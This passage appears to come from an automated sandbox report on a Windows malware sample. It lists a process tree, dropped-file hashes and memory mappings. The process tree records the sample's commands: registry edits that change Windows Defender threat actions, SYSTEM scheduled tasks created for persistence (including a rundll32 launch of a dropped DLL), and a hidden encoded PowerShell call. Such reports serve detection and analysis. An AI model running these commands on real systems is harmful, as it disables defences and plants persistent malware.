C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GOHuTEzoowDRCugrT"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GOHuTEzoowDRCugrT"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GOHuTEzoowDRCugrT2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GOHuTEzoowDRCugrT2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "IZejQZgJAzccrSKMR"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IZejQZgJAzccrSKMR"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "IZejQZgJAzccrSKMR2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IZejQZgJAzccrSKMR2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "aEUAiKTJppKmHMxMERr"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aEUAiKTJppKmHMxMERr"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "aEUAiKTJppKmHMxMERr2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aEUAiKTJppKmHMxMERr2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OofpducfGPaQjeebuuX"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OofpducfGPaQjeebuuX"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OofpducfGPaQjeebuuX2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OofpducfGPaQjeebuuX2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BsZkTgYBU\fUOLXK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "skPkswxjkHVnnFn" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PdYtKThMMGtdGak"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PdYtKThMMGtdGak"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PdYtKThMMGtdGak2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PdYtKThMMGtdGak2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KfUZRjbSKGVXWq"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KfUZRjbSKGVXWq"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jJUlnnVqTkofc"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jJUlnnVqTkofc"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jJUlnnVqTkofc2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jJUlnnVqTkofc2"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "skPkswxjkHVnnFn2" /F /xml "C:\Program Files (x86)\BsZkTgYBU\OfrtJwm.xml" /RU "SYSTEM"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "skPkswxjkHVnnFn"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "skPkswxjkHVnnFn"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EktCWFQgIFwHAp" /F /xml "C:\Program Files (x86)\HJbvTEnmUxKU2\XlimpiE.xml" /RU "SYSTEM"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VkpVyrVlAWRij2" /F /xml "C:\ProgramData\ehtkUBLERmscXYVB\ACWeZGU.xml" /RU "SYSTEM"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IZejQZgJAzccrSKMR2" /F /xml "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\reqCPqL.xml" /RU "SYSTEM"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OofpducfGPaQjeebuuX2" /F /xml "C:\Program Files (x86)\CzYifeKYfmykC\wHUFExf.xml" /RU "SYSTEM"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuLVTpNBpEt" /SC once /ST 02:12:21 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\gQWQxzdZ\zbeqEEi.exe\" fD /S"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuLVTpNBpEt"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuLVTpNBpEt"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuLVTpNBpEt"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\gQWQxzdZ\zbeqEEi.exeC:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\gQWQxzdZ\zbeqEEi.exe fD /S1⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\BsZkTgYBU\OfrtJwm.xmlMD5
03c79713283ef02273c4386800b0cfa0
SHA14a98fcd1b6ad75be470865b68ab879224411d193
SHA256f1172bc05c9a7c2b245c91e359a3b71180aefe951b0a5e762f83999dd73a25f8
SHA512f3ee02bc5edaa873577f6176476879098c84435d49c28d5f380a03b64b11451505d0f812cf071535fa46272d5b1262d6fb355da27f2cb32b89ba9d7291df50e5
-
C:\Program Files (x86)\CzYifeKYfmykC\wHUFExf.xmlMD5
3c34f3785a5102d63dee8b225057a0cd
SHA16f95af9d6abf6d49beca7283434b62a41eb6f738
SHA256da039a46116a7875aacd965e946df17d6a5ca9c448fbbc4c1ef450ea6b3747ed
SHA5123f51d73806a3f9391f0b11cab2b3eb908bc2feb50b05b5fa46bf94aeb6c5fd4e28f45c3d6dbc888755c8e274a0dd037af59e94efef59992b9320aae826286cfe
-
C:\Program Files (x86)\HJbvTEnmUxKU2\XlimpiE.xmlMD5
fdbda34703ab9510cb08eb9028f023a2
SHA1479bff0c1ca121a75117c23bf91658d4d21b4235
SHA2567405fa01210ab44e1fa181302f965cf556842f59f07b4af7012f9bc6c5c98cb5
SHA5126bfabf715061c1aa48a006c3a78a94214aae3c976691f592a06c7f72cbad817bfcb924663025d5130b88ced1a338d5392edb789d57ca8c6fdbae59f221f57757
-
C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\reqCPqL.xmlMD5
48b00186facec3b80d900c6949f0d0bc
SHA1ec0883c10bbdc9262aec49432d9337f7abbc53e4
SHA256426eacb3a7b6514fad38282f088ac49a831936856239c118282b8124d92a0746
SHA51268040d5141da8e55f1f57fa9879b089ae9cd4c55aa530e60fd5df2f0984197fbf5e6a906e76e85cda3f027d8c0b0109e8420bcdb2d33a11c84d36e22b99ec4b1
-
C:\ProgramData\ehtkUBLERmscXYVB\ACWeZGU.xmlMD5
5429deb813e26dd18c58964668e65423
SHA1b31a3244ed81adeffffbdb7e3edb9db02302b93d
SHA2568ac856e2a425a22fd649220a4d1255ecf69a3b72edf3c5b8b44b6c78f0d106af
SHA512bacd0a82fa38586a4636ca763647d414a6fd7e2cec2ad06e900719c6f027b517b49f5ccb8b2e052e325fb03343bd8a5178ff7b7bb6380004dbeb6c940e6b5659
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
0f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0df1744f7ee2fe6b2ca43d6278306a2d
SHA1d702e5326a34d3daa93341d6249c99fcd1daadf9
SHA256b9e0bd2ea095e1f4c2cd894fd61a4e8aa4af0265ae349cf85743c0a723c5ad03
SHA51293095c019c8b4e02d01dcd514fd255d10c043dce7c821a79f1f0fe33c2c23e26a0ad75b63924a7881199e15cd8cca350751323322e32ae305de342c30d14f3cd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
3d119b23e9427ba17e601476ffe0bd8a
SHA1f629684aa34becef406a4d0c8588521905865e25
SHA256a072eb2983ee38bb987a8bcc88d25ed5553f58ba9d00ee81e50dee5b3c126f75
SHA512dd48adf579b1e5d4eb3e18cae17617dd3e2c078439386dabf7599a629697f949931dbaad10d38cb7b2b93dd3272e19ac5ceaf95a1f334c0e8ca9d62b51c8bee4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
4dbe9266c72d18b4aeaf32d751dadffd
SHA1f8262d3c1f0afcaae8747c6e7df0ed1604965d31
SHA256b25c41ed972b2782c891484fec22e52532554278aa87c720c2a30a88b2fb8ac5
SHA5129220c673b0cbe157bb4a526376c02f0996a82b5fc177093e911a6f206f2fc2f31265c879d6cfdc5c86cfeacf600b6322ef61d0bc655b0bc1554236004c749e1e
-
C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exeMD5
24aaaf51a83907c21f3dc68ecc49aba6
SHA18d7c0773849e541fb8f8d04ca5911116a60ff24d
SHA25675c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546
SHA512d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0
-
C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exeMD5
24aaaf51a83907c21f3dc68ecc49aba6
SHA18d7c0773849e541fb8f8d04ca5911116a60ff24d
SHA25675c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546
SHA512d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0
-
C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\gQWQxzdZ\zbeqEEi.exeMD5
24aaaf51a83907c21f3dc68ecc49aba6
SHA18d7c0773849e541fb8f8d04ca5911116a60ff24d
SHA25675c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546
SHA512d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0
-
C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\gQWQxzdZ\zbeqEEi.exeMD5
24aaaf51a83907c21f3dc68ecc49aba6
SHA18d7c0773849e541fb8f8d04ca5911116a60ff24d
SHA25675c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546
SHA512d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0
-
memory/204-438-0x0000000000000000-mapping.dmp
-
memory/208-119-0x0000000000000000-mapping.dmp
-
memory/340-99-0x0000000000000000-mapping.dmp
-
memory/384-59-0x0000000000000000-mapping.dmp
-
memory/392-131-0x0000000000000000-mapping.dmp
-
memory/396-439-0x0000000000000000-mapping.dmp
-
memory/412-65-0x0000000000000000-mapping.dmp
-
memory/416-34-0x0000000000000000-mapping.dmp
-
memory/488-64-0x0000000000000000-mapping.dmp
-
memory/580-39-0x0000000073D20000-0x000000007440E000-memory.dmpFilesize
6.9MB
-
memory/580-37-0x0000000000000000-mapping.dmp
-
memory/632-35-0x0000000000000000-mapping.dmp
-
memory/680-61-0x0000000000000000-mapping.dmp
-
memory/744-76-0x00000267405C0000-0x00000267405C1000-memory.dmpFilesize
4KB
-
memory/744-74-0x00000267281C0000-0x00000267281C1000-memory.dmpFilesize
4KB
-
memory/744-73-0x00007FF803540000-0x00007FF803F2C000-memory.dmpFilesize
9.9MB
-
memory/764-136-0x0000000000000000-mapping.dmp
-
memory/852-96-0x0000000000000000-mapping.dmp
-
memory/888-442-0x0000000000000000-mapping.dmp
-
memory/908-0-0x0000000000000000-mapping.dmp
-
memory/912-129-0x0000000000000000-mapping.dmp
-
memory/1008-11-0x0000000007FB0000-0x0000000007FB1000-memory.dmpFilesize
4KB
-
memory/1008-10-0x00000000076B0000-0x00000000076B1000-memory.dmpFilesize
4KB
-
memory/1008-5-0x0000000000000000-mapping.dmp
-
memory/1008-6-0x0000000073D20000-0x000000007440E000-memory.dmpFilesize
6.9MB
-
memory/1008-15-0x0000000008700000-0x0000000008701000-memory.dmpFilesize
4KB
-
memory/1008-14-0x00000000087A0000-0x00000000087A1000-memory.dmpFilesize
4KB
-
memory/1008-13-0x0000000007E20000-0x0000000007E21000-memory.dmpFilesize
4KB
-
memory/1008-12-0x0000000008020000-0x0000000008021000-memory.dmpFilesize
4KB
-
memory/1008-7-0x0000000004BC0000-0x0000000004BC1000-memory.dmpFilesize
4KB
-
memory/1008-8-0x0000000007730000-0x0000000007731000-memory.dmpFilesize
4KB
-
memory/1008-9-0x0000000007510000-0x0000000007511000-memory.dmpFilesize
4KB
-
memory/1076-114-0x0000000000000000-mapping.dmp
-
memory/1152-54-0x0000000000000000-mapping.dmp
-
memory/1172-68-0x0000000000000000-mapping.dmp
-
memory/1176-53-0x0000000000000000-mapping.dmp
-
memory/1180-820-0x0000000000000000-mapping.dmp
-
memory/1328-19-0x0000000000000000-mapping.dmp
-
memory/1344-109-0x0000000000000000-mapping.dmp
-
memory/1396-69-0x0000000000000000-mapping.dmp
-
memory/1496-107-0x0000000000000000-mapping.dmp
-
memory/1536-139-0x0000000000000000-mapping.dmp
-
memory/1640-106-0x0000000000000000-mapping.dmp
-
memory/1828-77-0x0000000000000000-mapping.dmp
-
memory/1992-440-0x0000000000000000-mapping.dmp
-
memory/2044-138-0x0000000000000000-mapping.dmp
-
memory/2068-56-0x0000000000000000-mapping.dmp
-
memory/2072-23-0x0000000000000000-mapping.dmp
-
memory/2080-117-0x0000000000000000-mapping.dmp
-
memory/2140-22-0x0000000000000000-mapping.dmp
-
memory/2148-55-0x0000000000000000-mapping.dmp
-
memory/2188-60-0x0000000000000000-mapping.dmp
-
memory/2200-94-0x0000000000000000-mapping.dmp
-
memory/2228-28-0x0000000000000000-mapping.dmp
-
memory/2260-121-0x0000000000000000-mapping.dmp
-
memory/2284-26-0x0000000000000000-mapping.dmp
-
memory/2288-58-0x0000000000000000-mapping.dmp
-
memory/2296-126-0x0000000000000000-mapping.dmp
-
memory/2328-110-0x0000000000000000-mapping.dmp
-
memory/2368-134-0x0000000000000000-mapping.dmp
-
memory/2548-108-0x0000000000000000-mapping.dmp
-
memory/2748-67-0x0000000000000000-mapping.dmp
-
memory/2756-444-0x0000000000000000-mapping.dmp
-
memory/2764-70-0x0000000000000000-mapping.dmp
-
memory/2796-132-0x0000000000000000-mapping.dmp
-
memory/2812-16-0x0000000000000000-mapping.dmp
-
memory/2820-57-0x0000000000000000-mapping.dmp
-
memory/2856-100-0x0000000000000000-mapping.dmp
-
memory/2868-30-0x0000000000000000-mapping.dmp
-
memory/2884-436-0x0000000000000000-mapping.dmp
-
memory/2968-66-0x0000000000000000-mapping.dmp
-
memory/2972-122-0x0000000000000000-mapping.dmp
-
memory/2976-97-0x0000000000000000-mapping.dmp
-
memory/3016-120-0x0000000000000000-mapping.dmp
-
memory/3052-18-0x0000000000000000-mapping.dmp
-
memory/3096-31-0x0000000000000000-mapping.dmp
-
memory/3100-62-0x0000000000000000-mapping.dmp
-
memory/3172-116-0x0000000000000000-mapping.dmp
-
memory/3180-24-0x0000000000000000-mapping.dmp
-
memory/3212-104-0x0000000000000000-mapping.dmp
-
memory/3240-4-0x0000000010000000-0x0000000010586000-memory.dmpFilesize
5.5MB
-
memory/3240-140-0x0000000003A80000-0x0000000003B05000-memory.dmpFilesize
532KB
-
memory/3240-1-0x0000000000000000-mapping.dmp
-
memory/3244-105-0x0000000000000000-mapping.dmp
-
memory/3272-17-0x0000000000000000-mapping.dmp
-
memory/3328-87-0x0000000008350000-0x0000000008351000-memory.dmpFilesize
4KB
-
memory/3328-90-0x0000000008B30000-0x0000000008B31000-memory.dmpFilesize
4KB
-
memory/3328-80-0x0000000000000000-mapping.dmp
-
memory/3328-81-0x00000000737F0000-0x0000000073EDE000-memory.dmpFilesize
6.9MB
-
memory/3344-130-0x0000000000000000-mapping.dmp
-
memory/3380-973-0x0000000000000000-mapping.dmp
-
memory/3416-127-0x0000000000000000-mapping.dmp
-
memory/3472-78-0x0000000000000000-mapping.dmp
-
memory/3476-128-0x0000000000000000-mapping.dmp
-
memory/3496-52-0x0000000000000000-mapping.dmp
-
memory/3508-95-0x0000000000000000-mapping.dmp
-
memory/3512-115-0x0000000000000000-mapping.dmp
-
memory/3536-32-0x0000000000000000-mapping.dmp
-
memory/3540-27-0x0000000000000000-mapping.dmp
-
memory/3544-51-0x0000000000000000-mapping.dmp
-
memory/3596-133-0x0000000000000000-mapping.dmp
-
memory/3620-20-0x0000000000000000-mapping.dmp
-
memory/3628-33-0x0000000000000000-mapping.dmp
-
memory/3656-974-0x0000000000000000-mapping.dmp
-
memory/3660-137-0x0000000000000000-mapping.dmp
-
memory/3692-135-0x0000000000000000-mapping.dmp
-
memory/3704-71-0x0000000000000000-mapping.dmp
-
memory/3716-113-0x0000000000000000-mapping.dmp
-
memory/3752-98-0x0000000000000000-mapping.dmp
-
memory/3796-72-0x0000000000000000-mapping.dmp
-
memory/3808-21-0x0000000000000000-mapping.dmp
-
memory/3812-25-0x0000000000000000-mapping.dmp
-
memory/3824-92-0x0000000000000000-mapping.dmp
-
memory/3836-125-0x0000000000000000-mapping.dmp
-
memory/3900-819-0x0000000000000000-mapping.dmp
-
memory/3908-29-0x0000000000000000-mapping.dmp
-
memory/3916-93-0x0000000000000000-mapping.dmp
-
memory/3920-63-0x0000000000000000-mapping.dmp
-
memory/3928-446-0x0000000000000000-mapping.dmp
-
memory/3944-112-0x0000000000000000-mapping.dmp
-
memory/3952-123-0x0000000000000000-mapping.dmp
-
memory/3960-102-0x0000000000000000-mapping.dmp
-
memory/3964-101-0x0000000000000000-mapping.dmp
-
memory/3976-124-0x0000000000000000-mapping.dmp
-
memory/3980-103-0x0000000000000000-mapping.dmp
-
memory/3988-36-0x0000000000000000-mapping.dmp
-
memory/3996-111-0x0000000000000000-mapping.dmp
-
memory/4012-118-0x0000000000000000-mapping.dmp
-
memory/4080-50-0x0000000000000000-mapping.dmp